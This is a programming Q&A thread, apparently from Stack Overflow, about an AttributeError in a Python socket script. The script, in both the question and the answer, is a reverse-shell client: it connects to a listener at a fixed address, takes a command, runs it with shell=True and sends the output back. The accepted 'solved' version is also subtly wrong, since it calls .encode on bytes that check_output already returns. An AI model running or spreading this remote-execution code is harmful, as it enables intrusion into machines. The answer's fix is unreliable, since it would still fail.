# AttributeError: 'bytes' object has no attribute 'read' on Python Sockets Library

Tags: python, string, sockets, attributes, byte

I am trying to execute subprocess on my other pc with sockets.

```
import socket
import subprocess

def command_execution(command_exec):
    return subprocess.check_output(command_exec, shell=True)


ip, port = "192.168.1.46", 8080
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((ip, port))
connection.send(b"Conncetion OK !\n")

command = connection.recv(1024)
copt = command_execution(command)

connection.send(copt)

connection.close()
```

Getting this error -->
nextchar = self.instream.read(1)
AttributeError: 'bytes' object has no attribute 'read'

I am troubling with that Attribute Error. How can i fix this ?
It works without subprocess

Comment: Does it work when you execute a subprocess without sockets? Does it work when you use sockets without a subprocess?

Comment: It works without subprocess

Comment: Does the subprocess work without sockets?

Comment: yes it does work

Comment: and why don't you show the whole error?

Answer (score 0):

Solved.

```
import socket
import subprocess


def command_execution(command):
    return subprocess.check_output(command, shell=True)


ip, port = "192.168.1.46", 8080
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((ip, port))
connection.send(b"Conncetion OK !\n")

command = connection.recv(1024)

command_output = command_execution(command.decode("ascii"))
connection.send(command_output.encode('ascii'))
connection.close()
```

The problem was,  connection.recv() takes data in binary, but subprocess needs string data. So first decode connection.rev() to string, pass it to subprocess_checkoutput function, than take output to convert it back to binary, so connection.send() can work.